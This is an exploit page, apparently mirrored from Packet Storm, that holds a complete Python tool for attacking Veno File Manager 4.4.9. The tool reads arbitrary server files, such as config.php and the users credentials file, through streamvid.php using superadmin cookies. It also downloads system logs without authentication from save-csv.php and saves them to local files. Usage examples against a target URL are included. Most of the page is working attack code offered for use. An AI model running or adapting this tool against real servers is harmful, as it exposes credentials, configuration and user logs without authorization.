Share
## https://sploitus.com/exploit?id=PACKETSTORM:223857
==================================================================================================================================
| # Title : Veno File Manager 4.4.9 - Exploit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://veno.es/updates/logs/?slug=vfm/ |
==================================================================================================================================
[+] Summary : This script is an exploit tool for Veno File Manager 4.4.9 that demonstrates two security issues:
Authenticated file disclosure: uses superadmin cookies to read arbitrary server files.
Unauthenticated log access: downloads system logs without needing login.
It sends HTTP requests to vulnerable endpoints, extracts sensitive data, and can save logs locally for analysis.
[+] POc :
#!/usr/bin/env python3
import requests
import base64
import sys
import argparse
from urllib.parse import urljoin
class VFMExploit:
def __init__(self, target_url):
self.target_url = target_url.rstrip('/')
self.session = requests.Session()
def disclose_file_authenticated(self, cookie_name, cookie_value, file_path):
"""
Vulnerability 1: Arbitrary File Disclosure (Requires superadmin privileges)
"""
print(f"[*] Attempting to read file: {file_path}")
cookies = {cookie_name: cookie_value}
print("[*] Step 1: Changing initial directory to ./")
post_url = urljoin(self.target_url, "/vfm-admin/index.php")
response = self.session.post(
post_url,
cookies=cookies,
data={"starting_dir": "./"},
verify=False
)
print(f"[*] Step 2: Reading file via streamvid.php")
encoded_path = base64.b64encode(file_path.encode()).decode()
get_url = urljoin(self.target_url, f"/vfm-admin/ajax/streamvid.php?vid={encoded_path}")
response = self.session.get(get_url, cookies=cookies, verify=False)
if response.status_code == 200:
print("[โ] File extracted successfully!")
print("="*50)
print(response.text)
print("="*50)
return response.text
else:
print(f"[โ] Extraction failed. Status code: {response.status_code}")
return None
def download_logs_unauthenticated(self, start_date):
"""
Vulnerability 2: Unauthenticated Log Download
"""
print(f"[*] Attempting to download logs since date: {start_date}")
post_url = urljoin(self.target_url, "/vfm-admin/admin-panel/view/analytics/save-csv.php")
data = {
"logsince": start_date,
"loguntil": "3000-12-31"
}
try:
response = self.session.post(post_url, data=data, verify=False, timeout=30)
if response.status_code == 200 and len(response.text) > 0:
print(f"[โ] Logs downloaded successfully! ({len(response.text)} bytes)")
print("="*50)
print(response.text[:2000]) # Display the first 2000 characters only
if len(response.text) > 2000:
print(f"\n... and {len(response.text)-2000} more characters remaining")
print("="*50)
filename = f"logs_{start_date}.csv"
with open(filename, 'w', encoding='utf-8') as f:
f.write(response.text)
print(f"[*] Logs saved to file: {filename}")
return response.text
else:
print(f"[โ] No logs found or download failed")
return None
except Exception as e:
print(f"[โ] Error: {e}")
return None
def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
"""
Execute all possible exploit checks
"""
print("="*60)
print("Veno File Manager 4.4.9 - Multi Exploit Tool")
print("="*60)
results = {}
if cookie_name and cookie_value and file_path:
print("\n[+] Executing Exploit 1: File Disclosure")
results['file_disclosure'] = self.disclose_file_authenticated(
cookie_name, cookie_value, file_path
)
if start_date:
print("\n[+] Executing Exploit 2: Log Download")
results['logs_download'] = self.download_logs_unauthenticated(start_date)
return results
def main():
parser = argparse.ArgumentParser(
description='Veno File Manager 4.4.9 - Exploit Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
python exploit.py -u http://target.com/vfm --logs 2024-01-01
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
"""
)
parser.add_argument('-u', '--url', required=True, help='Application path (e.g., http://target.com/vfm)')
parser.add_argument('-c', '--cookie-name', help='Session cookie name for authentication')
parser.add_argument('-v', '--cookie-value', help='Session cookie value for authentication')
parser.add_argument('-f', '--file', help='Path of the file to read (e.g., ../../config.php)')
parser.add_argument('-l', '--logs', help='Download logs starting from date (yyyy-mm-dd)')
args = parser.parse_args()
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
exploit = VFMExploit(args.url)
exploit.exploit_all(
cookie_name=args.cookie_name,
cookie_value=args.cookie_value,
file_path=args.file,
start_date=args.logs
)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================